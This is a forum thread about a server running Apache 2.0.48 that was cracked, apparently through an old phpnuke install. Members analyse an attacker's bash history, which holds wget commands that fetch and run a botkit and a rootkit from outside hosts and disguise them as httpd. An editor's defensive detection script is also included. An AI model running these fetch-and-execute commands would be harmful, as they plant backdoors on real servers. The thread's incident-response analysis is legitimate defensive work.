# Hacker, Crackers and such...

## tradenet

Not sure if I'm giving people a heads up but here it goes....

net-www/apache-2.0.48-r1  

Recently I've been experiencing unusual activity in /tmp

User apache seems to be accessing this directory and, interestingly, left this bash history (in /tmp) plus some remnants. Here, for everyone's pleasure, is the bash history:

```text
w
/sbin/ifconfig | grep inet
cd /var/tmp
wget bsdvault.org/pelet/pakyuh/tgz
wget bsdvault.org/pelet/pakyuh.tgz
tar -zxvf pakyuh.tgz
cd cintakuh
ps -x
./kik "/usr/sbin/apache2 -k start" httpd
exit
ps -x
cd /var/tmp/cintakuh
./kik "mysql" httpd
ps -x
ps -x
cd ..
uname -a
wget pupet.net/gadis/slack
chmod 755 slack
./slack
exit
```

..........

So what's with apache? And where is the back door?

----------

## adaptr

*tradenet wrote:*

> wget bsdvault.org/pelet/pakyuh.tgz

This is a botkit with both IRC and http servers.

*tradenet wrote:*

> ./kik "/usr/sbin/apache2 -k start" httpd

This replaces the valid apache daemon with the botkit version.

*tradenet wrote:*

> ./kik "mysql" httpd

Same for mysql.

This essentially gives the cracker access to all your web/mysql content, and a backdoor via IRC to issue his commands to the daemons he installed.

*tradenet wrote:*

> wget pupet.net/gadis/slack
> 
> chmod 755 slack
> 
> ./slack

This is a real rootkit - presumably a root shell with an IRC connection or such.

*tradenet wrote:*

> So what's with apache? And where is the back door?

Where it is is irrelevant - you have been cracked.

Remove the HD and re-install.

Really.

----------

## Dalrain

I applaud adaptr for his knowledge of exactly what these are, and I agree you should totally wipe your drive and start again.  If you can spare the time additionally though, some forensics might be a good idea.  (After pulling the box from the net!)

Reinstalling and then getting bit by the same problem isn't fun.   Any specific ideas on what might have let them in?

----------

## adaptr

*Dalrain wrote:*

> I applaud adaptr for his knowledge of exactly what these are

Not too heavy on the praise, please...  :Wink: 

I downloaded the files in his logs - the wget commands give real, exact URLs, so they are simply downloadable!

Then opened up the tar.gz one (safe enough) and looked at some files - hey! it's an IRC server thingy!

Reflex reaction: IRC bot.

There's also a fakey httpd, so that would be a replacement for a valid apache.

The other binary (slack) is a 435 KB ELF executable, so probably a rootkit/root shell.

Really, deduction is all I used.

The fact that these traces were left is nothing to go on - the whole point is that he is able to cover his tracks from the moment he gains root, so you will never actually see an attacker being root.

Very important lil' factoid to NOT forget!

BTW the OP might like to check the URLs (see http://samspade.org) and file an official complaint to the owner of the domain(s).

And I will warn you again: do not use this machine - get it off the net and kill the HD before more harm is done!

----------

## Derringer

Indeed, take this machine off the net and do an analysis of your logs to try and prevent the same thing from happening on a re-install.

There are a couple of things that become apparent, to start your investigation with:

The bash history you saw was simply careless work.  Unless you caught this immediately after the rootkit was installed, this person should have immediately wiped that evidence, but alas, they did not, and they have given you something to go on.

Since he was user 'apache', it follows that he broke in via the apache process.  Look for evidence of stack or buffer overflows to allow him a shell under user 'apache'.  Other possible sources are poorly installed or written cgi-scripts.

Was your installation pretty much default or did you mess around with it a lot (specifically asking about your apache install)? Did you have server-side scripts up and running?

The actual diagnosis of exactly what was done can help  many of us here who try to stay ahead of the game.  Please keep us updated =)

----------

## tradenet

This machine is a fresh install (about two months old), and I have been watching this box carefully. I looked at all the logs...however I am suspicious of an older phpnuke installation on this box. I checked the phpnuke.org site but this version appears to have no security alerts or upgrades. Luckily I managed to catch this as it was being done, so no apparent damage. It appears also that the botkit was crashing as it was being executed.

*Derringer wrote:*

> Indeed, take this machine off the net and do an analysis of your logs to try and prevent the same thing from happening on a re-install.
> 
> There are a couple of things that become apparent, to start your investigation with:
> 
> The bash history you saw was simply careless work.  Unless you caught this immediately after the rootkit was installed, this person should have immediately wiped that evidence, but alas, they did not, and they have given you something to go on.
> ...

----------

## drspewfy

What is the version of Apache?

I'm sure that you have been hacked by apache,

that's why the user has Apache privileges...

and is using the apache user.

You should change, in /etc/shadow, the user of apache to -> /bin/false, and not use /bin/bash.

seya

----------

## tradenet

Yes, if you look at the top of this thread...

net-www/apache

      Latest version available: 2.0.48-r1

      Latest version installed: 2.0.48-r1

      Size of downloaded files: 6,111 kB

/etc/shadow?

maybe /etc/passwd...yes it's /bin/false

*drspewfy wrote:*

> What is the version of Apache?
> 
> I'm sure that you have been hacked by apache,
> 
> that's why the user has Apache privileges...
> ...

----------
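As an added example (the editor's, not code from this thread), here is a small post-incident check that follows from the last two posts and from adaptr's reading of the `kik` commands: the login shell of service accounts is read from /etc/passwd (field 7), and processes owned by `apache` are flagged when the executable they actually run lives outside the system tree, whatever name they present in `ps`. The passwd lines and process rows at the bottom are constructed; `--live` mode assumes Linux `/proc` and GNU `stat`.

```shell
#!/bin/sh
# Editor's added example, not code from the thread. Two checks for the signs
# discussed above, runnable offline on the constructed samples at the bottom,
# or against the real system with --live (assumes Linux /proc and GNU stat).

# flag_interactive_service_shells USER... < passwd-file
# Prints "user:shell" for each named user whose login shell is interactive.
# The shell field is field 7 of /etc/passwd (not /etc/shadow).
flag_interactive_service_shells() {
    awk -F: -v users="$*" '
        BEGIN { n = split(users, u, " "); for (i = 1; i <= n; i++) want[u[i]] = 1 }
        ($1 in want) && $7 != "/bin/false" && $7 != "/sbin/nologin" && $7 != "/usr/sbin/nologin" { print $1 ":" $7 }'
}

# flag_masquerading USER TRUSTED_PREFIX < "user exe argv0" rows
# Prints processes owned by USER whose real executable (what /proc/PID/exe
# resolves to) is outside TRUSTED_PREFIX (no trailing slash), whatever name
# argv[0] presents. This is the trace ./kik leaves: a binary under /var/tmp
# that calls itself httpd.
flag_masquerading() {
    awk -v user="$1" -v dir="$2" '
        $1 == user && index($2, dir "/") != 1 { print $2 " (" $3 ")" }'
}

# Builds "user exe argv0" rows from the live process table. Resolving the exe
# link of another user's process needs root.
live_process_table() {
    for p in /proc/[0-9]*; do
        u=$(stat -c %U "$p" 2>/dev/null) || continue
        e=$(readlink "$p/exe" 2>/dev/null) || continue
        c=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null | cut -d' ' -f1)
        echo "$u $e $c"
    done
}

# Constructed samples mirroring the thread: apache has /bin/bash as its shell,
# and an "httpd" owned by apache really runs from /var/tmp/cintakuh.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
apache:x:81:81:apache:/var/www:/bin/bash
mysql:x:60:60:mysql:/var/lib/mysql:/bin/false'
SAMPLE_PROCS='root /usr/sbin/apache2 /usr/sbin/apache2
apache /usr/sbin/apache2 /usr/sbin/apache2
apache /var/tmp/cintakuh/httpd httpd'

if [ "${1:-}" = "--live" ]; then
    flag_interactive_service_shells apache mysql < /etc/passwd
    live_process_table | flag_masquerading apache /usr
else
    printf '%s\n' "$SAMPLE_PASSWD" | flag_interactive_service_shells apache mysql
    printf '%s\n' "$SAMPLE_PROCS" | flag_masquerading apache /usr
fi
```

On the samples this prints `apache:/bin/bash` and `/var/tmp/cintakuh/httpd (httpd)`; an empty result from both checks on a live box does not prove it is clean, only that these two traces are absent.

----------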

## tradenet

Frankly, we need more discussion on these activities. People really need to "come out" and reveal.

----------

## Hara

*tradenet wrote:*

> Frankly, we need more discussion on these activities. People really need to "come out" and reveal.

I agree.

However, after googling information on firewalls, I am unable to conclude how this would be prevented. I am aware that Linux is much more secure than Windows; however, Linux is not infallible. My question is this: how can this be prevented? Is not running normally as root, having a firewall, and keeping up to date on the newest versions of software the best way, or is there more?

----------

## adaptr

"Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".

 :Wink: 

----------

## tradenet

Good one.   :Very Happy: 

*adaptr wrote:*

> "Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".

----------

## tradenet

BTW, I understand cows in the Netherlands live in hotels  :Cool: 

*adaptr wrote:*

> "Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".

----------

## Deebster

Please keep a backup of all your logs and files in htdocs (+ the whole machine if you've got the space  :Wink: )

I'm running that version of apache too, so I'd like to know how he did get in (paranoia++).

/var/log/apache2/access_log and /var/log/apache2/error_log would be particularly useful things to go over if you don't mind posting/sending them.

----------

## tradenet

Indeed. As soon as I find something relevant I will post it. Seems, tho', things are pointing towards mod-php....maybe a version of phpnuke.

*Deebster wrote:*

> Please keep a backup of all your logs and files in htdocs (+ the whole machine if you've got the space)
> 
> I'm running that version of apache too, so I'd like to know how he did get in (paranoia++).
> 
> /var/log/apache2/access_log and /var/log/apache2/error_log would be particularly useful things to go over if you don't mind posting/sending them.

----------

## adaptr

*tradenet wrote:*

> BTW, I understand cows in the Netherlands live in hotels

No, you're thinking of American tourists.

----------

## tradenet

 :Laughing:   :Laughing: 

*adaptr wrote:*

> *tradenet wrote:* BTW, I understand cows in the Netherlands live in hotels
> 
> No, you're thinking of American tourists.

:Laughing: 

----------

